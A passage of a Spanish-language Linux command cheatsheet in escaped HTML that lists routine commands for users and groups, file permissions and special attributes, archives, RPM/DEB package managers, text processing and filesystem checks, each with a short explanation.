&lt;div&gt;
&lt;b&gt;groupmod -n nuevo_nombre_del_grupo viejo_nombre_del_grupo&lt;/b&gt;: renombrar un grupo.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;useradd -c “Name Surname ” -g admin -d /home/user1 -s /bin/bash user1&lt;/b&gt;: Crear un nuevo usuario perteneciente al grupo “admin”.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;useradd user1&lt;/b&gt;: crear un nuevo usuario.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;userdel -r user1&lt;/b&gt;: borrar un usuario (‘-r’ elimina el directorio Home).&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;usermod -c “User &lt;acronym title="File Transfer Protocol"&gt;FTP&lt;/acronym&gt;” -g system -d /ftp/user1 -s /bin/nologin user1&lt;/b&gt;: cambiar los atributos del usuario.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;passwd&lt;/b&gt;: cambiar contraseña.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;passwd user1&lt;/b&gt;: cambiar la contraseña de un usuario (solamente por root).&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;chage -E 2011-12-31 user1&lt;/b&gt;: colocar un plazo para la contraseña del usuario. En este caso dice que la clave expira el 31 de diciembre de 2011.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;pwck&lt;/b&gt;: chequear la sintaxis correcta el formato de fichero de ‘/etc/passwd’ y la existencia de usuarios.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;grpck&lt;/b&gt;: chequear la sintaxis correcta y el formato del fichero ‘/etc/group’ y la existencia de grupos.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;newgrp group_name&lt;/b&gt;: registra a un nuevo grupo para cambiar el grupo predeterminado de los ficheros creados recientemente.&lt;/div&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;h2&gt;
&lt;a href="http://www.blackploit.com/2013/05/cheatsheet-comandos-para-GNU-Linux.html" name="pfiche"&gt;&lt;/a&gt;Permisos en Ficheros (Usa ”+” para colocar permisos y ”-” para eliminar)&lt;/h2&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;ls -lh&lt;/b&gt;: Mostrar permisos.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;ls /tmp | pr -T5 -W$COLUMNS&lt;/b&gt;: dividir la terminal en 5 columnas.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;chmod ugo+rwx directory1&lt;/b&gt;: colocar permisos de lectura ®, escritura (w) y ejecución(x) al propietario (u), al grupo (g) y a otros (o) sobre el directorio ‘directory1?.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;chmod go-rwx directory1&lt;/b&gt;: quitar permiso de lectura ®, escritura (w) y (x) ejecución al grupo (g) y otros (o) sobre el directorio ‘directory1?.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;chown user1 file1&lt;/b&gt;: cambiar el dueño de un fichero.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;chown -R user1 directory1&lt;/b&gt;: cambiar el propietario de un directorio y de todos los ficheros y directorios contenidos dentro.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;chgrp group1 file1&lt;/b&gt;: cambiar grupo de ficheros.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;chown user1:group1 file1&lt;/b&gt;: cambiar usuario y el grupo propietario de un fichero.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;find / -perm -u+s&lt;/b&gt;: visualizar todos los ficheros del sistema con SUID configurado.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;chmod u+s /bin/file1&lt;/b&gt;: colocar el bit SUID en un fichero binario. El usuario que corriendo ese fichero adquiere los mismos privilegios como dueño.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;chmod u-s /bin/file1&lt;/b&gt;: deshabilitar el bit SUID en un fichero binario.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;chmod g+s /home/public&lt;/b&gt;: colocar un bit SGID en un directorio –similar al SUID pero por directorio.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;chmod g-s /home/public&lt;/b&gt;: desabilitar un bit SGID en un directorio.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;chmod o+t /home/public&lt;/b&gt;: colocar un bit STIKY en un directorio. Permite el borrado de ficheros solamente a los dueños legítimos.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;chmod o-t /home/public&lt;/b&gt;: desabilitar un bit STIKY en un directorio.&lt;/div&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;h2&gt;
&lt;a href="http://www.blackploit.com/2013/05/cheatsheet-comandos-para-GNU-Linux.html" name="afiche"&gt;&lt;/a&gt;Atributos especiales en ficheros (Usa ”+” para colocar permisos y ”-” para eliminar)&lt;/h2&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;chattr +a file1&lt;/b&gt;: permite escribir abriendo un fichero solamente modo append.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;chattr +c file1&lt;/b&gt;: permite que un fichero sea comprimido / descomprimido automaticamente.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;chattr +d file1&lt;/b&gt;: asegura que el programa ignore borrar los ficheros durante la copia de seguridad.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;chattr +i file1&lt;/b&gt;: convierte el fichero en invariable, por lo que no puede ser eliminado, alterado, renombrado, ni enlazado.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;chattr +s file1&lt;/b&gt;: permite que un fichero sea borrado de forma segura.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;chattr +S file1&lt;/b&gt;: asegura que un fichero sea modificado, los cambios son escritos en modo synchronous como con sync.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;chattr +u file1&lt;/b&gt;: te permite recuperar el contenido de un fichero aún si este está cancelado.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;lsattr&lt;/b&gt;: mostrar atributos especiales.&lt;/div&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;h2&gt;
&lt;a href="http://www.blackploit.com/2013/05/cheatsheet-comandos-para-GNU-Linux.html" name="arfiche"&gt;&lt;/a&gt;Archivos y Ficheros comprimidos&lt;/h2&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;bunzip2 file1.bz2&lt;/b&gt;: descomprime in fichero llamado ‘file1.bz2?.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;bzip2 file1&lt;/b&gt;: comprime un fichero llamado ‘file1?.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;gunzip file1.gz&lt;/b&gt;: descomprime un fichero llamado ‘file1.gz’.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;gzip file1&lt;/b&gt;: comprime un fichero llamado ‘file1?.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;gzip -9 file1&lt;/b&gt;: comprime con compresión máxima.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;rar a file1.rar test_file&lt;/b&gt;: crear un fichero rar llamado ‘file1.rar’.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;rar a file1.rar file1 file2 dir1&lt;/b&gt;: comprimir ‘file1?, ‘file2? y ‘dir1? simultáneamente.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;rar x file1.rar&lt;/b&gt;: descomprimir archivo rar.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;unrar x file1.rar&lt;/b&gt;: descomprimir archivo rar.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;tar -cvf archive.tar file1&lt;/b&gt;: crear un tarball descomprimido.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;tar -cvf archive.tar file1 file2 dir1&lt;/b&gt;: crear un archivo conteniendo ‘file1?, ‘file2? y’dir1?.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;tar -tf archive.tar&lt;/b&gt;: mostrar los contenidos de un archivo.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;tar -xvf archive.tar&lt;/b&gt;: extraer un tarball.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;tar -xvf archive.tar -C /tmp&lt;/b&gt;: extraer un tarball en / tmp.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;tar -cvfj archive.tar.bz2 dir1&lt;/b&gt;: crear un tarball comprimido dentro de bzip2.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;tar -xvfj archive.tar.bz2&lt;/b&gt;: descomprimir un archivo tar comprimido en bzip2&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;tar -cvfz archive.tar.gz dir1&lt;/b&gt;: crear un tarball comprimido en gzip.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;tar -xvfz archive.tar.gz&lt;/b&gt;: descomprimir un archive tar comprimido en gzip.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;zip file1.zip file1&lt;/b&gt;: crear un archivo comprimido en zip.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;zip -r file1.zip file1 file2 dir1&lt;/b&gt;: comprimir, en zip, varios archivos y directorios de forma simultánea.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;unzip file1.zip&lt;/b&gt;: descomprimir un archivo zip.&lt;/div&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;h2&gt;
&lt;a href="http://www.blackploit.com/2013/05/cheatsheet-comandos-para-GNU-Linux.html" name="rpm"&gt;&lt;/a&gt;Paquetes RPM (Red Hat, Fedora y similares)&lt;/h2&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;rpm -ivh package.rpm&lt;/b&gt;: instalar un paquete rpm.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;rpm -ivh –nodeeps package.rpm&lt;/b&gt;: instalar un paquete rpm ignorando las peticiones de dependencias.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;rpm -U package.rpm&lt;/b&gt;: actualizar un paquete rpm sin cambiar la configuración de los ficheros.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;rpm -F package.rpm&lt;/b&gt;: actualizar un paquete rpm solamente si este está instalado.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;rpm -e package_name.rpm&lt;/b&gt;: eliminar un paquete rpm.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;rpm -qa&lt;/b&gt;: mostrar todos los paquetes rpm instalados en el sistema.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;rpm -qa | grep httpd&lt;/b&gt;: mostrar todos los paquetes rpm con el nombre “httpd”.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;rpm -qi package_name&lt;/b&gt;: obtener información en un paquete específico instalado.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;rpm -qg “System Environment/Daemons”&lt;/b&gt;: mostar los paquetes rpm de un grupo software.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;rpm -ql package_name&lt;/b&gt;: mostrar lista de ficheros dados por un paquete rpm instalado.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;rpm -qc package_name&lt;/b&gt;: mostrar lista de configuración de ficheros dados por un paquete rpm instalado.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;rpm -q package_name –whatrequires&lt;/b&gt;: mostrar lista de dependencias solicitada para un paquete rpm.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;rpm -q package_name –whatprovides&lt;/b&gt;: mostar la capacidad dada por un paquete rpm.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;rpm -q package_name –scripts&lt;/b&gt;: mostrar los scripts comenzados durante la instalación /eliminación.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;rpm -q package_name –changelog&lt;/b&gt;: mostar el historial de revisions de un paquete rpm.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;rpm -qf /etc/httpd/conf/httpd.conf&lt;/b&gt;: verificar cuál paquete rpm pertenece a un fichero dado.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;rpm -qp package.rpm -l&lt;/b&gt;: mostrar lista de ficheros dados por un paquete rpm que aún no ha sido instalado.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;rpm –import /media/cdrom/RPM-GPG-KEY&lt;/b&gt;: importar la firma digital de la llave pública.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;rpm –checksig package.rpm&lt;/b&gt;: verificar la integridad de un paquete rpm.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;rpm -qa gpg-pubkey&lt;/b&gt;: verificar la integridad de todos los paquetes rpm instalados.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;rpm -V package_name&lt;/b&gt;: chequear el tamaño del fichero, licencias, tipos, dueño, grupo, chequeo de resumen de MD5 y última modificación.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;rpm -Va&lt;/b&gt;: chequear todos los paquetes rpm instalados en el sistema. Usar con cuidado.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;rpm -Vp package.rpm&lt;/b&gt;: verificar un paquete rpm no instalado todavía.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;rpm2cpio package.rpm | cpio –extract –make-directories *bin&lt;/b&gt;*: extraer fichero ejecutable desde un paquete rpm.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;rpm -ivh /usr/src/redhat/RPMS/`arch`/package.rpm&lt;/b&gt;: instalar un paquete construido desde una fuente rpm.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;rpmbuild –rebuild package_name.src.rpm&lt;/b&gt;: construir un paquete rpm desde una fuente rpm.&lt;/div&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;h2&gt;
&lt;a href="http://www.blackploit.com/2013/05/cheatsheet-comandos-para-GNU-Linux.html" name="yum"&gt;&lt;/a&gt;Actualizador de paquetes YUM (Red Hat, Fedora y similares)&lt;/h2&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;yum install package_name&lt;/b&gt;: descargar e instalar un paquete rpm.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;yum localinstall package_name.rpm&lt;/b&gt;: este instalará un RPM y tratará de resolver todas las dependencies para ti, usando tus repositorios.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;yum update package_name.rpm&lt;/b&gt;: actualizar todos los paquetes rpm instalados en el sistema.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;yum update package_name&lt;/b&gt;: modernizar / actualizar un paquete rpm.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;yum remove package_name&lt;/b&gt;: eliminar un paquete rpm.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;yum list&lt;/b&gt;: listar todos los paquetes instalados en el sistema.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;yum search package_name&lt;/b&gt;: Encontrar un paquete en repositorio rpm.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;yum clean packages&lt;/b&gt;: limpiar un caché rpm borrando los paquetes descargados.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;yum clean headers&lt;/b&gt;: eliminar todos los ficheros de encabezamiento que el sistema usa para resolver la dependencia.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;yum clean all&lt;/b&gt;: eliminar desde los paquetes caché y ficheros de encabezado.&lt;/div&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;h2&gt;
&lt;a href="http://www.blackploit.com/2013/05/cheatsheet-comandos-para-GNU-Linux.html" name="deb"&gt;&lt;/a&gt;Paquetes Deb (Debian, Ubuntu y derivados)&lt;/h2&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;dpkg -i package.deb&lt;/b&gt;: instalar / actualizar un paquete deb.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;dpkg -r package_name&lt;/b&gt;: eliminar un paquete deb del sistema.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;dpkg -l&lt;/b&gt;: mostrar todos los paquetes deb instalados en el sistema.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;dpkg -l | grep httpd&lt;/b&gt;: mostrar todos los paquetes deb con el nombre “httpd”&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;dpkg -s package_name&lt;/b&gt;: obtener información en un paquete específico instalado en el sistema.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;dpkg -L package_name&lt;/b&gt;: mostar lista de ficheros dados por un paquete instalado en el sistema.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;dpkg –contents package.deb&lt;/b&gt;: mostrar lista de ficheros dados por un paquete no instalado todavía.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;dpkg -S /bin/ping&lt;/b&gt;: verificar cuál paquete pertenece a un fichero dado.&lt;/div&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;h2&gt;
&lt;a href="http://www.blackploit.com/2013/05/cheatsheet-comandos-para-GNU-Linux.html" name="apt"&gt;&lt;/a&gt;Actualizador de paquetes APT (Debian, Ubuntu y derivados)&lt;/h2&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;apt-get install package_name&lt;/b&gt;: instalar / actualizar un paquete deb.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;apt-cdrom install package_name&lt;/b&gt;: instalar / actualizar un paquete deb desde un cdrom.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;apt-get update&lt;/b&gt;: actualizar la lista de paquetes.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;apt-get upgrade&lt;/b&gt;: actualizar todos los paquetes instalados.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;apt-get remove package_name&lt;/b&gt;: eliminar un paquete deb del sistema.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;apt-get check&lt;/b&gt;: verificar la correcta resolución de las dependencias.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;apt-get clean&lt;/b&gt;: limpiar cache desde los paquetes descargados.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;apt-cache search searched-package&lt;/b&gt;: retorna lista de paquetes que corresponde a la serie «paquetes buscados».&lt;/div&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;h2&gt;
&lt;a href="http://www.blackploit.com/2013/05/cheatsheet-comandos-para-GNU-Linux.html" name="cont"&gt;&lt;/a&gt;Ver el contenido de un fichero&lt;/h2&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;cat file1&lt;/b&gt;: ver los contenidos de un fichero comenzando desde la primera hilera.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;tac file1&lt;/b&gt;: ver los contenidos de un fichero comenzando desde la última línea.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;more file1&lt;/b&gt;: ver el contenido a lo largo de un fichero.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;less file1&lt;/b&gt;: parecido al commando ‘more’ pero permite salvar el movimiento en el fichero así como el movimiento hacia atrás.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;head -2 file1&lt;/b&gt;: ver las dos primeras líneas de un fichero.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;tail -2 file1&lt;/b&gt;: ver las dos últimas líneas de un fichero.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;tail -f /var/log/messages&lt;/b&gt;: ver en tiempo real qué ha sido añadido al fichero.&lt;/div&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;h2&gt;
&lt;a href="http://www.blackploit.com/2013/05/cheatsheet-comandos-para-GNU-Linux.html" name="texto"&gt;&lt;/a&gt;Manipulación de texto&lt;/h2&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;cat file1 file2 .. | command &amp;lt;&amp;gt; file1_in.txt_or_file1_out.txt&lt;/b&gt;: sintaxis general para la manipulación de texto utilizando PIPE, STDIN y STDOUT.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;cat file1 | command( sed, grep, awk, grep, etc…) &amp;gt; result.txt&lt;/b&gt;: sintaxis general para manipular un texto de un fichero y escribir el resultado en un fichero nuevo.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;cat file1 | command( sed, grep, awk, grep, etc…) » result.txt&lt;/b&gt;: sintaxis general para manipular un texto de un fichero y añadir resultado en un fichero existente.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;grep Aug /var/log/messages&lt;/b&gt;: buscar palabras “Aug” en el fichero ‘/var/log/messages’.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;grep ^Aug /var/log/messages&lt;/b&gt;: buscar palabras que comienzan con “Aug” en fichero ‘/var/log/messages’&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;grep [0-9] /var/log/messages&lt;/b&gt;: seleccionar todas las líneas del fichero ‘/var/log/messages’ que contienen números.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;grep Aug -R /var/log/&lt;/b&gt;*: buscar la cadena “Aug” en el directorio ‘/var/log’ y debajo.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;sed ‘s/stringa1/stringa2/g’ example.txt&lt;/b&gt;: reubicar “string1” con “string2” en ejemplo.txt&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;sed ‘/^$/d’ example.txt&lt;/b&gt;: eliminar todas las líneas en blanco desde el ejemplo.txt&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;sed ‘/ *#/d; /^$/d’ example.txt&lt;/b&gt;: eliminar comentarios y líneas en blanco de ejemplo.txt&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;echo ‘esempio’ | tr ‘[:lower:]‘ ‘[:upper:]‘&lt;/b&gt;: convertir minúsculas en mayúsculas.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;sed -e ’1d’ result.txt&lt;/b&gt;: elimina la primera línea del fichero ejemplo.txt&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;sed -n ‘/stringa1/p’&lt;/b&gt;: visualizar solamente las líneas que contienen la palabra “string1”.&lt;/div&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;h2&gt;
&lt;a href="http://www.blackploit.com/2013/05/cheatsheet-comandos-para-GNU-Linux.html" name="estable"&gt;&lt;/a&gt;Establecer caracter y conversión de ficheros&lt;/h2&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;dos2unix filedos.txt fileunix.txt&lt;/b&gt;: convertir un formato de fichero texto desde MSDOS a UNIX.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;unix2dos fileunix.txt filedos.txt&lt;/b&gt;: convertir un formato de fichero de texto desde UNIX a MSDOS.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;recode ..&lt;acronym title="HyperText Markup Language"&gt;HTML&lt;/acronym&gt; &amp;lt; page.txt &amp;gt; page.html&lt;/b&gt;: convertir un fichero de texto en html.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;recode -l | more&lt;/b&gt;: mostrar todas las conversiones de formato disponibles.&lt;/div&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;h2&gt;
&lt;a href="http://www.blackploit.com/2013/05/cheatsheet-comandos-para-GNU-Linux.html" name="analisis"&gt;&lt;/a&gt;Análisis del sistema de ficheros&lt;/h2&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;badblocks -v /dev/hda1&lt;/b&gt;: Chequear los bloques defectuosos en el disco hda1.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;fsck /dev/hda1&lt;/b&gt;: reparar / chequear la integridad del fichero del sistema Linux en el disco hda1.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;fsck.ext2 /dev/hda1&lt;/b&gt;: reparar / chequear la integridad del fichero del sistema ext 2 en el disco hda1.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;e2fsck /dev/hda1&lt;/b&gt;: reparar / chequear la integridad del fichero del sistema ext 2 en el disco hda1.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;e2fsck -j /dev/hda1&lt;/b&gt;: reparar / chequear la integridad del fichero del sistema ext 3 en el disco hda1.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;fsck.ext3 /dev/hda1&lt;/b&gt;: reparar / chequear la integridad del fichero del sistema ext 3 en el disco hda1.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;fsck.vfat /dev/hda1&lt;/b&gt;: reparar / chequear la integridad del fichero sistema fat en el disco hda1.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
